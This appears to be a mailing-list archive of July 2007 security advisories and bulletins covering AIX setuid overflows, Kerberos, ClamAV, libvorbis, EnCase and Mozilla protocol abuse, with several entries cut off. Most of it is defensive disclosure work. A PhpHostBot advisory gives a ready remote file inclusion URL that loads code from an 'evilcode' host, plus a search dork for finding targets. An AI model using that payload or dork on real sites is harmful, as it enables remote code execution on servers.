iDefense Security Advisory 07.26.07: IBM AIX capture Terminal Control Sequence Buffer Overflow Vulnerability
IBM AIX capture Terminal Control Sequence Buffer Overflow Vulnerability

iDefense Security Advisory 07.26.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 26, 2007

I. BACKGROUND

The capture program is a setuid root application, installed by default under multiple versions of IBM AIX, that allows terminal sessions to be dumped to a file. More information can be found at the following URL.

http://publib.boulder.ibm.com/infocenter/pseries/v5r3/topic/com.ibm.aix.cmds/doc/aixcmds1/capture.htm

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow vulnerability in the 'capture' program, as included with IBM Corp.'s AIX operating system, allows an attacker to execute arbitrary code with root privileges.

The vulnerability exists within the code that parses terminal control sequences. A long series of control sequences will trigger an exploitable stack-based buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with root privileges. The capture program is setuid root, and executable by any user with local access. The vulnerability is a stack-based buffer overflow, and is trivially exploitable.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in AIX version 5.3 with service pack 6. Previous versions may also be affected.

V. WORKAROUND

Removing the setuid bit from the binary will prevent exploitation, but may make the program unusable by non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below.

http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007- to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/05/2007  Initial vendor notification
06/08/2007  Initial vendor response
07/26/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
FLEA-2007-0034-1:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0034-1
Published: 2007-07-26
Rating: Major
Updated Versions:
    lighttpd=/[EMAIL PROTECTED]:devel//1/1.4.15-0.3-1
    group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.6-2

References:
    https://issues.rpath.com/browse/RPL-1550
    https://issues.rpath.com/browse/RPL-1554

Description:
    Previous versions of the lighttpd package are vulnerable to multiple attacks, among which remote attackers may circumvent access-control settings or crash the server by issuing various malformed or malicious requests. It has not been determined that these vulnerabilities can be exploited to execute malicious code.

    lighttpd is configured to be the default web server for the Foresight System Manager. If a malicious user were to cause a Denial of Service via the above attack vectors, the system would no longer be configurable or updateable via the System Manager.

- ---
Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (GNU/Linux)

iQIVAwUBRqjDLNfwEn07iAtZAQJ/GBAAhfGTlgT8142XQZNzLd2LcWBDHdRJBUZE
ciGE5gcXsD+d/ixh592s+ET4eP9NkjrMKgH42fqW/KN9vEJ5WhZ/0s3dGojiGBEs
FsxU+DFWAa7ACLUt83Izm39HBrHtanzwrHHddkXIkF04Dcv12HoK/1g4imTLFQ9p
3NICH6n/S8G4idpIotbxVvBa+AU7rM/x0m/Ekits8fDybSrFYhLyyWVELWUUB8ww
sxxnCmUfCTw6t4YgTud8BEuEf2zaGNPKybfydCVKpk6YtDzepuS+bDsblDmStA7f
O8pcwz20s8hIspchf9hAeGjsuLYW+oteEuLWcbYmbTd6nNUzk+rh62CwZrrsrsJQ
Ws0vb7fC8wbKlVwUuA746vM0JxPl5b3VeqDSRvc8olRnzx72f4LyGYSsoENxTgv+
toI9RSkAt1/Hl8gcika1tpQ+s8Rex90sBlT47W7kIaD2WP2OqmvR5hpPqusqLA/l
mwi+f0tE/kTAL4vFXOH5+GSTA9q+x6pg0JNhCh/V97Z9RWmVenRoLtxbuznsryez
td+l7fCpkk5950sBWnHCRTdPlrGrumgu9sx7/ZpSYdizqSnSXj8Jex/f2oS6KNG6
8O8BSbdcg5579k7zMzmRC+6IMWlloJToEZ8lbE230JKiXaeVIojprA/i0kRtFzv6
kbnZjntvOCg=
=N9w3
-----END PGP SIGNATURE-----
RE: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities
-----Original Message-----
From: Williams, James K
Sent: Tuesday, July 24, 2007 7:56 PM
To: 'bugtraq@securityfocus.com'
Subject: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities

Title: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities

[...]

CVE References:
CVE-2006-5645, CVE-2007-3875
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5645
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3875

[...]

FYI - one of the CVE links above is incorrect. The correct URL is:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5645

Regards,
Ken

Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
[ GLSA 200707-11 ] MIT Kerberos 5: Arbitrary remote code execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200707-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: MIT Kerberos 5: Arbitrary remote code execution
      Date: July 25, 2007
      Bugs: #183338
        ID: 200707-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in MIT Kerberos 5 could potentially result in remote code execution with root privileges by unauthenticated users.

Background
==========

MIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  app-crypt/mit-krb5        < 1.5.2-r3                    >= 1.5.2-r3

Description
===========

kadmind is affected by multiple vulnerabilities in the RPC library shipped with MIT Kerberos 5. It fails to properly handle zero-length RPC credentials (CVE-2007-2442) and the RPC library can write past the end of the stack buffer (CVE-2007-2443). Furthermore kadmind fails to do proper bounds checking (CVE-2007-2798).

Impact
======

A remote unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code with root privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MIT Kerberos 5 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.5.2-r3"

References
==========

  [ 1 ] CVE-2007-2442
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442
  [ 2 ] CVE-2007-2443
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443
  [ 3 ] CVE-2007-2798
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200707-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

pgpHiyDY4vKmA.pgp
Description: PGP signature
[ MDKSA-2007:150 ] - Updated clamav packages fix vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:150
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : clamav
 Date    : July 25, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability in the RAR VM in ClamAV allowed user-assisted remote attackers to cause a crash via a crafted RAR archive which resulted in a NULL pointer dereference.

 Other bugs have also been corrected in 0.91.1 which is being provided with this update.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3725
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.0:
 a1d7123d64b17de98db72e05959657e0  2007.0/i586/clamav-0.91.1-1.1mdv2007.0.i586.rpm
 4e814bbff65dc4129f398f72b6d62640  2007.0/i586/clamav-db-0.91.1-1.1mdv2007.0.i586.rpm
 c6267bcae66562a2458cf9ad5d6de8f4  2007.0/i586/clamav-milter-0.91.1-1.1mdv2007.0.i586.rpm
 1f263279bf4cd5460786fe0759c0ec96  2007.0/i586/clamd-0.91.1-1.1mdv2007.0.i586.rpm
 0b14d3e33ba65c556cbea0dd4b55a51c  2007.0/i586/clamdmon-0.91.1-1.1mdv2007.0.i586.rpm
 2bd3ff262e1f1b5d261e2aa986d23ad5  2007.0/i586/libclamav2-0.91.1-1.1mdv2007.0.i586.rpm
 b9b0dac5eccf1000b8301187bcad99b2  2007.0/i586/libclamav2-devel-0.91.1-1.1mdv2007.0.i586.rpm
 d1b697088a726c293ee54cc25b660308  2007.0/SRPMS/clamav-0.91.1-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 c0b6dc4ec4ab20dba0129966d42cd75e  2007.0/x86_64/clamav-0.91.1-1.1mdv2007.0.x86_64.rpm
 8c28b0917575a5b0f2306f6c30d35df8  2007.0/x86_64/clamav-db-0.91.1-1.1mdv2007.0.x86_64.rpm
 fbf470d9921d86b6cfbf0b75a8723f71  2007.0/x86_64/clamav-milter-0.91.1-1.1mdv2007.0.x86_64.rpm
 9dbff52f73edb4b10efa681b2c3b6b38  2007.0/x86_64/clamd-0.91.1-1.1mdv2007.0.x86_64.rpm
 60f9f0b6e869e4931ea6a5e1521d079b  2007.0/x86_64/clamdmon-0.91.1-1.1mdv2007.0.x86_64.rpm
 4de72c8d9cd714e0b1b7d9d1aadcb131  2007.0/x86_64/lib64clamav2-0.91.1-1.1mdv2007.0.x86_64.rpm
 63dc325ae89be61dca20128ae021a812  2007.0/x86_64/lib64clamav2-devel-0.91.1-1.1mdv2007.0.x86_64.rpm
 d1b697088a726c293ee54cc25b660308  2007.0/SRPMS/clamav-0.91.1-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 5044c759d6cad93402ddd5350262f5fb  2007.1/i586/clamav-0.91.1-1.1mdv2007.1.i586.rpm
 9fdbb064de5d4752bf29b68edf86c9b7  2007.1/i586/clamav-db-0.91.1-1.1mdv2007.1.i586.rpm
 0bb59e9542365b9bd1faf3cdb041e1d1  2007.1/i586/clamav-milter-0.91.1-1.1mdv2007.1.i586.rpm
 2f95a4750b57cd52a8f8fe30ff62ad85  2007.1/i586/clamd-0.91.1-1.1mdv2007.1.i586.rpm
 33548bc49879899559d5700f7ec0add2  2007.1/i586/clamdmon-0.91.1-1.1mdv2007.1.i586.rpm
 4dc6d180ee9e306fa5eb3a1dfe81aa9e  2007.1/i586/libclamav2-0.91.1-1.1mdv2007.1.i586.rpm
 f2e5333e7c60c9cbc7b70f3994a867c3  2007.1/i586/libclamav2-devel-0.91.1-1.1mdv2007.1.i586.rpm
 fdb6ea9465c87b3206051df922e509d0  2007.1/SRPMS/clamav-0.91.1-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 15b628de57bf9b067dfe17e4050eae06  2007.1/x86_64/clamav-0.91.1-1.1mdv2007.1.x86_64.rpm
 f53ae231e7591079b7a9f88c948527d5  2007.1/x86_64/clamav-db-0.91.1-1.1mdv2007.1.x86_64.rpm
 be2c036992c7ebd82ffdc45e4679c83c  2007.1/x86_64/clamav-milter-0.91.1-1.1mdv2007.1.x86_64.rpm
 cabcdcf73a9e49ead2db583e1a55af71  2007.1/x86_64/clamd-0.91.1-1.1mdv2007.1.x86_64.rpm
 8f8e068f16c979be31d688069c76b797  2007.1/x86_64/clamdmon-0.91.1-1.1mdv2007.1.x86_64.rpm
 c37ebfab59ca964727252852af351988  2007.1/x86_64/lib64clamav2-0.91.1-1.1mdv2007.1.x86_64.rpm
 744eaf423e847ad4ed1204cfde0bac22  2007.1/x86_64/lib64clamav2-devel-0.91.1-1.1mdv2007.1.x86_64.rpm
 fdb6ea9465c87b3206051df922e509d0  2007.1/SRPMS/clamav-0.91.1-1.1mdv2007.1.src.rpm

 Corporate 3.0:
 3d676fd4f9e9ded80498b13ee9703447  corporate/3.0/i586/clamav-0.91.1-0.1.C30mdk.i586.rpm
 b9b12ef53061ccf1f695c2fffe6a04bb  corporate/3.0/i586/clamav-db-0.91.1-0.1.C30mdk.i586.rpm
 24da7dc91cbe989c78c7bdf6dba9e900  corporate/3.0/i586/clamav-milter-0.91.1-0.1.C30mdk.i586.rpm
 bc9fdfa2c9a6c356f7f14f186d2e57d9  corporate/3.0/i586/clamd-0.91.1-0.1.C30mdk.i586.rpm
 3e930ebd2759f14da53b0f2f4d8cf7da  corporate/3.0/i586/clamdmon-0.91.1-0.1.C30mdk.i586.rpm
 5897ace4abdc86cff7c7f9b073c4a046  corporate/3.0/i586/libclamav2-0.91.1-0.1.C30mdk.i586.rpm
 56909a444cdc2b2c60f4c07d8d829034  corporate/3.0/i586/libclamav2-devel-0.91.1-0.1.C30mdk.i586.rpm
 b1c34cc12fb36c73c469dcfbf4bcaa4e  corporate/3.0/SRPMS/clamav-0.91.1-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1d9868884be1e6222e4161458bb66c26  corporate/3.0/x86_64/clamav-0.91.1-0.1.C30mdk.x86_64.rpm
 7cfa0abb1592069c41b7a9e413c9c087  corporate/3.0/x86_64/clamav-db-0.91.1-0.1.C30mdk.x86_64.rpm
 eebc3cadf53dd91a4ce07e24f52dc769
Guidance Software response to iSEC report on EnCase
Guidance Software Response to iSEC Report

Guidance Software received and reviewed the report drafted by two presenters at the upcoming Black Hat USA conference. We have also spoken to Alex Stamos, one of the testing leaders. The report authors disclose that they conducted, over a period of six months, intensive testing utilizing specialized proprietary automated testing software. As a result of this extensive testing regimen, they were able to identify six test scenarios, out of tens of thousands of test scenarios run, that apparently revealed minor bugs in some cases for which there are straightforward workarounds in our EnCase® Forensic Edition software. All of the testing involved intentionally corrupted target data that highlighted a few relatively minor bugs.

The issues raised do not identify errors affecting the integrity of the evidence collection or authentication process, or the EnCase Enterprise process (i.e., the operation of the servlet code or the operation of the SAFE server). Moreover, the issues raised have nothing to do with the security of the product. Therefore, we strongly dispute any media reports or commentary that imply that there are any vulnerabilities or denials of service exposed by this report.

Forensic examiners will inevitably come across corrupted data on target systems from time to time; and in standard computer forensics training, including classes offered by Guidance Software, examiners are trained to account for such issues. In addition, while Guidance Software maintains a robust in-house quality assurance process and strives to make our software as stable as possible, no software is completely crash-proof and there will always be anomalies, particularly involving extreme scenarios of corrupted target data.

The following are the six anomalies raised by the report and our brief response to them:

1. [Logical] Disk Image Cannot be Acquired With Certain Corrupted MBR Partition Table.

Response: It should be no surprise to any computer forensic examiner that a logical copy of a volume may not be possible if that volume has a corrupted MBR Partition table. EnCase features an option to acquire the target media physically, rather than logically, to specifically account for this type of scenario. The authors ignored the option of acquiring the data physically. Also, by corrupting the MBR Partition table, the perpetrator would likely render his computer inoperable, which calls into question both the likelihood and feasibility of such a tactic.

2. Corrupted NTFS file system crashed EnCase during acquisition.

Response: The authors state that this issue appears to be caused by an attempt to read past the end of the buffer. However, EnCase features an option to de-select the automatic reading of the file system during the acquisition process. Thus, there is an easy work-around. Also, by corrupting the NTFS partitions, the perpetrator would likely render his file system dysfunctional, which calls into question both the likelihood and feasibility of such a tactic. Thus, the chances of this specific scenario occurring in the field are extremely remote; however, Guidance Software will test and, if verified, place this anomaly in its development queue to address the crashing problem in the future.

3. Corrupted Microsoft Exchange database crashes EnCase during multi-threaded search/analysis concurrent to acquisition

Response: The report discloses that this particular anomaly occurred only when every single check box was selected in the search dialogue box, including the search, hash value calculation and verify file signatures features. This means that EnCase was directed to acquire an Exchange database and perform a detailed multi-threaded search and analysis of the data at the same time. This procedure is extremely inconsistent with best practices and akin to opening several hundred files in a word processing program, which of course would cause a memory overload.

4. Corrupted NTFS file systems Causes Memory Error

Response: As noted above, corrupted files or file systems can create challenges. The authors themselves note that the bug is minor, stating that they have not found any ill effects caused by this error condition other than an error being displayed and corrupted records not being displayed. In addition, they noted that they are unaware of any exploitable condition that arises from this error.

5. EnCase Had Difficulty Reading Intentionally Corrupted NTFS File System Directory.

Response: This issue involves the authors intentionally corrupting an NTFS file system to create a loop by replacing a directory entry for a file with a reference to the directory's parent directory. Experienced forensic examiners are trained to identify such instances of data cloaking. The purposeful hiding of data by the subject of an investigation is in itself important evidence
SolpotCrew Advisory #14 (S4M3K) - PhpHostBot (login_form) Remote File Inclusion
+ PhpHostBot (login_form) Remote File Inclusion
+
+ Download link : http://www.idevspot.com/PhpHostBot.php
+
+ Bug Found By : S4M3K (24-07-2007)
+ contact: [EMAIL PROTECTED]
+ Website : http://www.m3ks.org/adv/m3ks-adv-24.7.07.txt
+
+ Greetz: Scr3W_W0rM, Nyubi, Home_edition2001, Dj-RuFfy, TOMMY_PENGAMEN, th0nk,
+ iFX, Cookie, VanDaMe, Dead
+ All member on #nyubicrew @irc.mildnet.org
+
+ Exploitation:
+
+ http://[target]/[path]/library/authorize.php?login_form=http://evilcode?
+
+ google dork : PhpHostBot ; inurl:PhpHostBot
Re: Mozilla protocol abuse
Since I published this report it has come to my attention that Thunderbird 1.5, unlike Thunderbird 2.0, has not been patched with the osint security flag. As such all Thunderbird 1.5 users are vulnerable against this attack and those exploits. Now would be a good time to upgrade to Thunderbird 2.0.

http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/

Regards
Thor Larholm

Thor Larholm wrote:
> The Mozilla application platform currently has an unpatched input validation flaw which allows you to specify arbitrary command line arguments to any registered URL protocol handler process.
>
> Jesper Johansson already detailed parts of this on his blog on July 20, http://msinfluentials.com/blogs/jesper/. I wrote a vulnerability report on July 18 together with a proof-of-concept exploit that targeted Thunderbird 2.0.0.4. Thunderbird 2.0.0.5 was released on July 19 and incidentally fixed this specific attack vector through its osint command line flag.
>
> It is now 6 days later and people should have had time to update their Thunderbird installations, so I have decided to publish my vulnerability report together with the exploits as they detail how to handle XPI exploitation.
>
> The HTML version can be found at
> http://larholm.com/2007/07/25/mozilla-protocol-abuse/
>
> A ZIP file with the report and the XPI exploits can be found at
> http://larholm.com/media/2007/7/mozillaprotocolabuse.zip
>
> Cheers
> Thor Larholm
libvorbis 1.1.2 - Multiple memory corruption flaws
iSEC Partners Security Advisory - 2007-003-libvorbis
http://www.isecpartners.com

libvorbis 1.1.2 - Multiple memory corruption flaws

Vendor: Xiph.org
Vendor URL: http://www.xiph.org
Systems Affected: All tested software based upon libvorbis 1.1.2
Severity: High (Heap corruption, Denial of Service, Potential code execution)
Author: David Thiel david[at]isecpartners[dot]com
Vendor notified: 2007-06-05
Public release: 2007-07-26
Advisory URL: http://www.isecpartners.com/advisories/2007-003-libvorbis.txt

Summary:

libvorbis 1.1.2 contains several vulnerabilities allowing heap overwrite, read violations and a function pointer overwrite. These bugs cause at least a denial of service, and potentially code execution.

Details:

Invalid blocksize_0 and blocksize_1 values result in a heap overwrite in the _01inverse() function of res0.c. An invalid mapping type causes an out of bounds dispatch table lookup, offset by an attacker-controlled value, during cleanup in vorbis_info_clear() in info.c. Additionally, invalid blocksize values cause a segmentation fault on read in block.c.

Fix Information:

These issues are resolved in libvorbis 1.2.0, available at:
http://downloads.xiph.org/releases/vorbis/libvorbis-1.2.0.tar.bz2

Thanks to:

- Ralph Giles and Xiphmont of Xiph.org for their detailed help determining root causes of and fixes for these issues.

About iSEC Partners:

iSEC Partners is a full-service security consulting firm that provides penetration testing, secure systems development, security education and software design verification, with offices in San Francisco and Seattle. Information on testing media players and codecs to expose and prevent similar bugs and tools to do the same will be presented at BlackHat USA 2007.

http://www.isecpartners.com
[EMAIL PROTECTED]
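Both root causes named in the advisory, an out-of-range blocksize and a mapping type used as a dispatch-table index, come down to a header field being used before it is checked. The C below is an added illustration written for this page, not libvorbis code: the cleanup table and its placeholder entry are stand-ins for the dispatch the advisory describes, while the one-byte nibble encoding of the two blocksizes and the valid ranges (powers of two from 64 to 8192, blocksize_0 no larger than blocksize_1, a single mapping type 0) follow the Vorbis I specification's identification and setup headers.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for the per-mapping-type cleanup table a decoder dispatches
 * through on vorbis_info_clear(). Vorbis I defines exactly one mapping
 * type (0); the body is a placeholder, only the bounds check matters. */
typedef int (*mapping_free_fn)(void *state);

static int mapping0_free(void *state) { (void)state; return 0; }

static const mapping_free_fn mapping_free_table[] = { mapping0_free };
#define NUM_MAPPING_TYPES \
    (sizeof mapping_free_table / sizeof mapping_free_table[0])

/* Identification header: one byte carries both block sizes as
 * exponents, blocksize_0 in the low nibble and blocksize_1 in the high
 * nibble. Valid sizes are powers of two from 64 to 8192 with
 * blocksize_0 <= blocksize_1. Returns true only for a valid pair and
 * leaves the outputs untouched otherwise. */
bool decode_blocksizes(uint8_t packed, long *bs0, long *bs1) {
    long b0 = 1L << (packed & 0x0F);
    long b1 = 1L << (packed >> 4);
    if (b0 < 64 || b0 > 8192 || b1 < 64 || b1 > 8192 || b0 > b1)
        return false;
    *bs0 = b0;
    *bs1 = b1;
    return true;
}

/* Mapping type as read from the setup header (a 16-bit field). An
 * unchecked `mapping_free_table[type](state)` fetches a function pointer
 * from past the end of the table whenever type >= NUM_MAPPING_TYPES,
 * which is the out-of-bounds dispatch the advisory describes. This
 * version refuses unknown types instead of indexing with them. */
int checked_mapping_free(long type, void *state) {
    if (type < 0 || (unsigned long)type >= NUM_MAPPING_TYPES)
        return -1;
    return mapping_free_table[type](state);
}

int main(void) {
    /* Constructed header bytes, not taken from any real stream. */
    const uint8_t samples[] = { 0xB8, 0x8B, 0x05, 0xF6 };
    for (size_t i = 0; i < sizeof samples; i++) {
        long bs0 = 0, bs1 = 0;
        bool ok = decode_blocksizes(samples[i], &bs0, &bs1);
        printf("0x%02X -> %s (%ld, %ld)\n", samples[i],
               ok ? "valid  " : "rejected", bs0, bs1);
    }
    printf("mapping type 0: %d, type 7: %d\n",
           checked_mapping_free(0, NULL), checked_mapping_free(7, NULL));
    return 0;
}
```

The check is cheap and belongs where the field is parsed, not where it is used: by the time `_01inverse()` or `vorbis_info_clear()` runs, every allocation and table size derived from the field has already been computed from the bad value.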
[security bulletin] HPSBMA02133 SSRT061201 rev.5 - HP Oracle for OpenView (OfO) Critical Patch Update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00727143
Version: 5

HPSBMA02133 SSRT061201 rev.5 - HP Oracle for OpenView (OfO) Critical Patch Update

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2006-07-19
Last Updated: 2007-07-18

Potential Security Impact: Local or remote compromise of confidentiality, availability, integrity.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Oracle® has issued a Critical Patch Update which contains solutions for a number of potential security vulnerabilities. These vulnerabilities may be exploited locally or remotely to compromise the confidentiality, availability or integrity of Oracle for OpenView (OfO).

References: Oracle Critical Patch Update - July 2007

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Oracle for OpenView (OfO) v8.1.7 or v9.1.01 or v9.2 running on HP-UX, Tru64 UNIX, Linux, Solaris, and Windows.

BACKGROUND
For a PGP signed version of this security bulletin please write to: [EMAIL PROTECTED]

Oracle is a registered U.S. trademark of the Oracle Corporation, Redwood City, California.

Oracle has issued Critical Patch Update - July 2007. For more information:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html

Information about previous Oracle Critical Patch Updates can be found here:
http://www.oracle.com/technology/deploy/security/alerts.htm

The following products are affected:

Product Number   Description
ORA200BC         OfO v8.1.7 for HP-UX LTU
ORA200CA         OfO v9.2 64bit HP-UX .11 LTU
ORA205BC         OfO v8.1.7 for HP-UX 5 LTU Bundle
ORA205CA         OfO v9.2 64bit HP-UX .11 5 LTUs
ORA230BC         OfO v8.1.7 for HP-UX Media
ORA230CA         OfO v9.2 64bit HP-UX .11 Media Kit
ORA240BC         OfO v8.1.7 for HP-UX Eval LTU Media
ORA300BC         OfO v8.1.7 for Win 2000/NT LTU
ORA300CA         OfO v9.2 32bit Windows LTU
ORA305BC         OfO v8.1.7 for Win 2000/NT 5 LTU Bundle
ORA305CA         OfO v9.2 32bit Windows 5 LTUs
ORA330BC         OfO v8.1.7 for Win 2000/NT Media
ORA330CA         OfO v9.2 32bit Windows Media Kit
ORA340BC         OfO v8.1.7 for Win 2000/NT Eval LTU
ORA400BC         OfO v8.1.7 for Sun Solaris LTU
ORA400CA         OfO v9.2 32bit Sun Solaris 2.7-2.8 LTU
ORA401CA         OfO v9.2 64bit Sun Solaris 2.7-2.8 LTU
ORA405BC         OfO v8.1.7 for Sun Solaris 5 LTU Bundle
ORA405CA         OfO v9.2 32bit Sun Solaris 2.7-2.8 5 LTU
ORA406CA         OfO v9.2 64bit Sun Solaris 2.7-2.8 5 LTU
ORA430BC         OfO v8.1.7 for Sun Solaris Media
ORA430CA         OfO v9.2 32bit Sun Solaris 2.7-2.8 Media
ORA431CA         OfO v9.2 64bit Sun Solaris 2.7-2.8 Media
ORA440BC         OfO v8.1.7 for Sun Solaris Eval LTU
ORA500CA         OfO v9.1.01 64bit Tru64 V5.1a LTU Ent.Ed
ORA505CA         OfO v9.1.01 64bit Tru64 V5.1a LTU
ORA530CA         OfO v9.1.01 64bit Tru64 V5.1a Media Kit
ORA600CA         OfO for Linux LTU
ORA605CA         OfO for Linux LTU Service Bureaus Bundle
ORA630CA         OfO v9.2.0 for Linux, Media Kit

AFFECTED VERSIONS

HP-UX B.11.11
HP-UX B.11.23
===
action: If Oracle for OpenView (OfO) is installed, install the Oracle Critical Patch Update - July 2007

END AFFECTED VERSIONS

Note: Since Oracle for OpenView (OfO) is not installed using swinstall(1M) the Security Patch Check Tool cannot determine whether it is present on an HP-UX system. Customer maintained configuration documentation should be consulted to determine whether Oracle for OpenView (OfO) is installed.

RESOLUTION
Oracle for OpenView (OfO) customers who have support contracts directly with Oracle should obtain the Critical Patch Update - July 2007 from Oracle.

Oracle for OpenView (OfO) customers who have support with Hewlett-Packard should contact their normal support channel to obtain the Critical Patch Update - July 2007.

For support contract information, please visit:
http://www.hp.com/managementsoftware/contract_maint

MANUAL ACTIONS: Yes - Update
Install the Oracle Critical Patch Update - July 2007.

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

HISTORY
Version:1 (rev.1) - 19 July 2006 Initial release Critical Patch Update - July 2006
Version:2 (rev.2) - 23 October 2006 Critical Patch Update - October 2006 is available
Version:3 (rev.3) - 22 January 2007 Critical Patch Update - January 2007 is available
Version:4 (rev.4) - 18 April 2007 Critical Patch Update - April 2007 is available
Version:5 (rev.5) - 18 July 2007 Critical Patch Update - July 2007 is available

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in
iDefense Security Advisory 07.26.07: IBM AIX ftp gets() Multiple Buffer Overflow Vulnerabilities
IBM AIX ftp gets() Multiple Buffer Overflow Vulnerabilities

iDefense Security Advisory 07.26.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 26, 2007

I. BACKGROUND

The ftp program is a client application for accessing data stored on FTP servers. This client is responsible for interfacing with users and speaking the FTP protocol with remote servers. Under AIX, the ftp program is installed by default and is setuid root. More information can be found at the following URL.

http://publib.boulder.ibm.com/infocenter/pseries/v5r3/topic/com.ibm.aix.cmds/doc/aixcmds2/ftp.htm

II. DESCRIPTION

Local exploitation of multiple buffer overflow vulnerabilities in the 'ftp' program, as included with IBM Corp.'s AIX operating system, allow an attacker to execute arbitrary code with root privileges.

These vulnerabilities exist due to several calls to the gets() function. The gets() function is a deprecated C library function used to read data from standard input into a buffer. This function provides no way to specify the maximum size of the buffer being read into, and therefore allows the buffer to be overflowed.

III. ANALYSIS

Exploitation of any of these vulnerabilities results in the execution of arbitrary code with root privileges. The ftp program is setuid root, and executable by any user with local access. At least one of these vulnerabilities results in a trivially exploitable stack-based buffer overflow.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in AIX version 5.3 with service pack 6. Previous versions may also be affected.

V. WORKAROUND

Removing the setuid bit from the binary will prevent exploitation, but may make the program unusable by non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below.

http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

VII. CVE INFORMATION

